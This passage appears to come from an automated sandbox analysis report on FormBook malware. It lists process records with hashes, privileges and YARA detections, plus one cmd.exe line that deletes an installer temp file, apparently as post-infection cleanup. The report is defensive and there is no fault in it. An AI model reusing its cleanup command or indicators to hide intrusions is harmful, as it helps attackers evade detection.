                                              MD5 hash:12AB5A6E917A80D7B94F2EBE725A4B23
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:14:40:45
                                              Start date:03/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0xffca0000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:14:41:09
                                              Start date:03/05/2021
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x1d0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:14:41:10
                                              Start date:03/05/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Windows\Installer\MSID8B1.tmp'
                                              Imagebase:0x4a580000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >